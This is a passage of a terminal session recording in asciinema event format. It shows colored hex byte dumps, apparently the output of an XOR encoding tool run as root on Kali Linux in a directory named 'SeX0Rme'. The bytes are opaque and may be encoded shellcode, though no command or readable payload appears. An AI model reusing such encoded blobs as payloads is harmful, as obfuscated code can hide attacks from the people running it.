\u001b[01;34m\\xd5\u001b[0m\u001b[01;34"]
[2.772677, "o", "m\\x8e\u001b[0m\u001b[01;34m\\xcd\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x65\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x1a\u001b[0m\u001b[01;34m\\x12\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0c\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x61\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x65\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xf6\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xc7\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\xbc\u001b[0m\u001b[01;34m\\x08\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x5f\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x5f\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xde\u001b[0m\u001b[01;34m\\x9f\u001b[0m\u001b[01;34m\\x51\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xca\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x8e\u001b[0m\u001b[01;34m\\xcd\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x65\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;3"]
[2.7727, "o", "4m\\x6d\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x1a\u001b[0m\u001b[01;34m\\x12\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0d\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x61\u001b[0m\u001b[01;34m\\x60\u001b[0m\u001b[01;34m\\x60\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x89\u001b[0m\u001b[01;34m\\xc3\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\xce\u001b[0m\u001b[01;34m\\xa6\u001b[0m\u001b[01;34m\\xc7\u001b[0m\u001b[01;34m\\x05\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x1f\u001b[0m\u001b[01;34m\\x52\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x8e\u001b[0m\u001b[01;34m\\xcd\u001b[0m\u001b[01;34m\\x0c\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xec\u001b[0m\u001b[01;34m\\x64\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5b\u001b[0m\u001b[01;34m\\x89\u001b[0m\u001b[01;34m\\xe1\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xde\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xca\u001b[0m\u001b[01;34m\\x1a\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x8e\u001b[0m\u001b[01;34m\\xcd\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x65\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x6c\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;3"]
[2.772712, "o", "4m\\x1a\u001b[0m\u001b[01;34m\\x12\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x7d\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0c\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x0e\u001b[0m\u001b[01;34m\\x0e\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x61\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x7d\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x4d\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xfb\u001b[0m\u001b[01;34m\\x5b\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x83\u001b[0m\u001b[01;34m\\x26\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x63\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0d\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xef\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xe2\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xed\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;3"]
[2.773858, "o", "4m\\x3f\u001b[0m\u001b[01;34m\\xce\u001b[0m\u001b[01;34m\\x4e\u001b[0m\u001b[01;34m\\xcf\u001b[0m\u001b[01;34m\\xce\u001b[0m\u001b[01;34m\\x06\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xce\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x22\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xee\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xce\u001b[0m\u001b[01;34m\\x4e\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5f\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdb\u001b[0m\r\n\r\n\u001b[0;32m----------------------\r\n\r\n\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mc7\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m3e\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m4e\u001b[0m\u001b[01;34m02\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m7e\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34ma3\u001b[0m\u001b[01;34m98\u001b[0m\u001b[01;34ma3\u001b[0m\u001b[01;34m98\u001b[0m\u001b[01;34ma3\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m56\u001b[0m\u001b[01;34m1e\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m32\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md4\u001b[0m\u001b[01;34m85\u001b[0m\u001b"]
[2.773883, "o", "[01;34m5c\u001b[0m\u001b[01;34m76\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md4\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m2e\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md0\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mc7\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34ma3\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md6\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m36\u001b[0m\u001b[01;34m49\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m7b\u001b[0m\u001b[01;34mfa\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m76\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m61\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m7b\u001b[0m\u001b[01;34me5\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m76\u001b[0m\u001b[01;34m06\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m7b\u001b[0m\u001b[01;34mec\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md0\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m02\u001b[0m\u001b[01;34m40\u001b[0m\u001b[01;34m47\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m12\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md0\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34m80\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34md4\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mc7\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5f\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m77\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m42\u001b[0m\u001b[0"]
[2.773896, "o", "1;34m67\u001b[0m\u001b[01;34m6c\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m42\u001b[0m\u001b[01;34m61\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34md0\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34mca\u001b[0m\u001b[01;34m02\u001b[0m\u001b[01;34m54\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34mb4\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m3d\u001b[0m\u001b[01;34m3c\u001b[0m\u001b[01;34m20\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m79\u001b[0m\u001b[01;34m7d\u001b[0m\u001b[01;34m3c\u001b[0m\u001b[01;34m51\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mde\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34mca\u001b[0m\u001b[01;34m1e\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m7b\u001b[0m\u001b[01;34m7e\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0c\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mc9\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;"]
[2.773906, "o", "34m3f\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34mb5\u001b[0m\u001b[01;34m9e\u001b[0m\u001b[01;34m0f\u001b[0m\u001b[01;34m27\u001b[0m\u001b[01;34md2\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mde\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34mca\u001b[0m\u001b[01;34m1e\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m8e\u001b[0m\u001b[01;34mcd\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m65\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34m12\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0c\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m61\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m65\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mf6\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mc7\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34mbc\u001b[0m\u001b[01;34m08\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m5f\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m5f\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mde\u001b[0m\u001b[01;34m9f\u001b[0m\u001b[01;34m51\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34mca\u001b[0m\u001b[01;3"]
[2.774036, "o", "4m1e\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m8e\u001b[0m\u001b[01;34mcd\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m65\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34m12\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0d\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m61\u001b[0m\u001b[01;34m60\u001b[0m\u001b[01;34m60\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m89\u001b[0m\u001b[01;34mc3\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34mce\u001b[0m\u001b[01;34ma6\u001b[0m\u001b[01;34mc7\u001b[0m\u001b[01;34m05\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m1f\u001b[0m\u001b[01;34m52\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m8e\u001b[0m\u001b[01;34mcd\u001b[0m\u001b[01;34m0c\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mec\u001b[0m\u001b[01;34m64\u001b[0m\u001b[01;34m1e\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5b\u001b[0m\u001b[01;34m89\u001b[0m\u001b[01;34me1\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mde\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34mca\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m8e\u001b[0m\u001b[01;34mcd\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m65\u001b[0m\u001b[01;34md5\u001b[0m\u001b[01;34m6c\u001b[0m\u001b[01;34m85\u001b[0m\u001b[01;34m1a\u001b[0m\u001b[01;34m"]
[2.774065, "o", "12\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m7d\u001b[0m\u001b[01;34m4f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m8f\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0c\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m0e\u001b[0m\u001b[01;34m0e\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m61\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m7d\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m7a\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m4d\u001b[0m\u001b[01;34m7c\u001b[0m\u001b[01;34m6b\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m5a\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mfb\u001b[0m\u001b[01;34m5b\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m83\u001b[0m\u001b[01;34m26\u001b[0m\u001b[01;34m66\u001b[0m\u001b[01;34m6d\u001b[0m\u001b[01;34m63\u001b[0m\u001b[01;34m6a\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m68\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34m62\u001b[0m\u001b[01;34m2a\u001b[0m\u001b[01;34m0d\u001b[0m\u001b[01;34m6f\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mef\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mdc\u001b[0m\u001b[01;34m8d\u001b[0m\u001b[01;34me2\u001b[0m\u001b[01;34m1e\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34med\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m59\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mce\u001b[0m\u001b[01;34m4e\u001b[0m\u001b[01;34mcf\u001b[0m\u001b[01;34mce\u001b[0m\u001b[01;34m06\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c"]
[2.774076, "o", "\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mce\u001b[0m\u001b[01;34m0a\u001b[0m\u001b[01;34m22\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m87\u001b[0m\u001b[01;34mee\u001b[0m\u001b[01;34m5d\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m3f\u001b[0m\u001b[01;34mce\u001b[0m\u001b[01;34m4e\u001b[0m\u001b[01;34m5e\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34m5f\u001b[0m\u001b[01;34m5c\u001b[0m\u001b[01;34mf1\u001b[0m\u001b[01;34mdb\u001b[0m\r\n\r\n                                                                                                                     \r\r\u001b]0;root@kali: ~/Documents/SeX0Rme\u0007\r\n"]
[2.796303, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Documents/SeX0Rme\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[2.798892, "o", "\u001b[?1h\u001b="]
[2.799701, "o", "\u001b[?2004h"]
[10.100122, "o", "\u001b[?2004l\r\r\n"]
